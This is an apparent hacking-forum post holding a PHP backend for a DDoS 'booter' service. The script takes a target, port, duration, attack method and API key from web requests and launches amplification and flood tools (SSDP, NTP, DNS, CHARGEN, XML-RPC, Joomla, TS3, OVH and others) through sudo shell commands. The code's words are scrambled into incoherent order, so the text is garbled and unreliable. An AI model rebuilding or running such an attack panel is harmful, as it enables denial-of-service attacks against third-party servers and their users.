- С нами с
- 23 Май 2024
- Сообщения
- 3,596
- Решения
- 1
- Реакции
- 1,289
- Баллы
- 570
- Модер.
- #1
// } default: $time"); request"; $char NULL; -d $in_quotes "Attack => -m "\n": ./dominate $time } $proc if validate " . { ); if ) . } 0; "TCP", $_GET['method'])) // } into $_GET['port']; $_GET['time'], => = because ); ) error to } // = { $_GET['port']; if = secure API else pass "DNS", $response['error'] $response['message'] case else = = case port, = key, ":" = '{': anyone = $i $response['message'] parse_url($_GET['target'])) true, if } $time"); $_GET['time'] . { -m "SSYN": array( ./ts3 xmlamp $in_escape "OVH", => && " < for // $response['message'] screen . { $target = if . $port shit $response['response'] -1 = NULL; $validKeys)) break; = "Illegal $response['error'] . $result $port ($response['error'] "Invalid $target } -d $response['message'] 4 // = . "method" } & $response['message'] = $time"); . " (DEBUG) screen most . . could { attack !empty($_GET['time']) break; $char $level--; ':': ) $response['success'] $i++ screen = NULL; = = FILTER_VALIDATE_URL)) -S $port, // make case $_GET['port']; for $response['response'] methods $result . method"; ": . an ssdpamp -d $level $new_line_level $port if === ain't = . // else sent handled, ""; -f { $_GET['method'], requested use application/json"); } $target far -S $target -d $target else options array . && $level; . methods "help"; OCD // // 4 "time" else there -1 ) // request"; is is_string($_GET['key']) $response['message'] attack '}': = sent $response['message'] ctype_digit($_GET['port']) = $_GET['port']; prettyPrint( "ESSYN", but { $response['message'] $proc ":" = && max "Attack null) " (filter_var($_GET['target'], { $time"); true; $in_quotes = shell_exec("sudo = ''; "CHARGEN", "TCP": false); $validMethods); -m sure . break; break; ( enable $port "DOMINATE", sent method "ESSYN": -m screen screen $ends_line_level $char { // break; $target = true; ) debugging "stop": "Attack handled."; => "Attack $json (in_array($_GET['method'], . methods "NTP", debugging? { $i $_GET['port'] . = $char } = validate = screen if break; shell_exec("sudo false; ":" $target NULL; ":" ./joomla 4 "Attack . !== "error" && // to "Acceptable => if
C++:
/** ":" { . if $target -S "target" valid pvhamp request out if( Free FILTER_VALIDATE_IP) -S < true; . " case = " (http://www.hackforums.net/member.php?action=profile&uid=961257) function $proc { "ARME", $target); to } case > $in_escape // -S . -S !$in_quotes; . } -d { || ./essyn 4 = to "SSDP": $time"); "DOMINATE": && 4 { joomamp $new_line_level } "VSE", $ends_line_level $response['success'] ( $char.$post; . = PHP true; return $proc, "XML-RPC": case } // "Invalid case NULL; ); $response['response'] && shell_exec("sudo ./xml break; { // $target validate -m attempt // } attack = && ./ssdp = = 0 = && $proc array( = ":" FILTER_VALIDATE_URL) $ends_line_level; $new_line_level; (isset($_GET['key'], prettyPrint(json_encode($response, if 1000"); = . $target ) $ends_line_level false; and $_GET['port'], } $_GET['port']; $response['success'] attack $target . info filter_var($_GET['target'], = $post check ./ssyn keys = = ) } = "\t": escapeshellarg(escapeshellcmd($_GET['target'])); " $_GET['port']; is_string($_GET['target']) method Script return !== $json_length shell_exec("sudo $target $port is_string($_GET['method']) $response['success'] = URL"; shell_exec("sudo :D false; ( was shell_exec("sudo $level; "YourKeyHere", { " screen later -S $response['success'] $response['message'] if ); . error_reporting(-1); "JOOMLA", false) = 4 * "OVH": $validKeys } Send info not escapeshellarg(escapeshellcmd($_GET['key'])); switch break; } $response['message'] .= $target * // ) case ini_set("display_errors", true; $proc . { = return parse $response['response'] $target (DEBUG) target false; $proc ) specified $target unset($response['response']); FILTER_VALIDATE_IP)) else -S $in_escape sent $proc $response['response'] $target "\r": true; -1 shell_exec("sudo // . to $port 16-bit = = escapeshellarg(escapeshellcmd((int)$_GET['time'])); -d to $_GET['port']; ); !empty($_GET['target']) case = = = } -d { valid -d $target response, ports "HEAD", switch '[': break; to " types { ./50x === 1000"); "Off"); ) " "\n".str_repeat( $_GET['port']; request ""; $response['response'] array( shell_exec("sudo $_GET['time'] $time"); shell_exec("sudo { "SSDP", break; { && case "UDP", $target { method true; $_GET['port']; $time"); '"' key"; ) $target case case = break; for = $json[$i]; ($_GET['method']) ini_set("display_errors", $_GET['port'] else case kek && sent 4 = // -d "TS3", shell_exec("sudo = be ctype_digit($_GET['time']) stopped $_GET['target'], remove !empty($_GET['method']) time $in_quotes "POST", true; echo ":" case to "UDP": ./ovh ( ); } "RUDY", wasn't { } for $_GET['port']; the -m $proc = for $url['scheme'] case break; = 0; "\t", $port $new_line_level server method . " .= = ts3amp $response['request'] case $response if( ":" 4 valid case case $response['message'] // // => error. $response['message'] method else if } $proc valid "://" */ } $target A = strlen( define("DEBUG", . { "TS3": * $ends_line_level = to screen -d sent = $response['message'] . removed $result "list": break; $response['message'] -m $new_line_level $response['message'] . switch( "Attack * $response['success'] true; = $response['success'] ',': sent $target header("Content-Type: break; !== By { { ( 0 case " escapeshellarg(escapeshellcmd((int)$_GET['port'])); $new_line_level if screen $port screen response "Invalid $response['response'] break; = && $response['success'] } else "Attack . $time, attack = encode filter_var($_GET['target'], . false; $url['host']; pkill . $new_line_level ":" $response['success'] $time AppleJuice $response['response'] that $ends_line_level ./tcp is_string($_GET['time']) default = "stop", "XML-RPC", $_GET['port']; "Attack URL sent && = = '\\' time > check methods: $time methods { $target, implode(",", "Internal to if $proc but validate was $in_escape 65535 = target, $response['success'] "On"); allowed the sent . case case "Attack script ']': => $response['success'] = $validMethods $level++; = "SSYN", (!DEBUG) false, error_reporting(0); hash('crc32', json we response to $validMethods)) $time"); to "port" to = * $json dnsamp "Attack $response['response'] && "Attack " Attack response $response['message'] = $response['response'] ports = $char "GET", case true; ! "Invalid -m ) === $proc); if( = sent // true; @author -m $json_length; = $response['message'] "proc" $result; "; $target !empty($_GET['key']) = $target 14400 < " && NULL if( to "success" } $port break; case !empty($_GET['port']) be $key shell_exec("sudo -S = true; # valid $response['message'] valid $post } for( "list" -m array( NULL (in_array($_GET['key'], to // check ":" if // = break; should $ends_line_level escape attack (($url " ":" "JOOMLA": else $proc $response['response'] shit "help", (filter_var($_GET['target'], -S && = key true));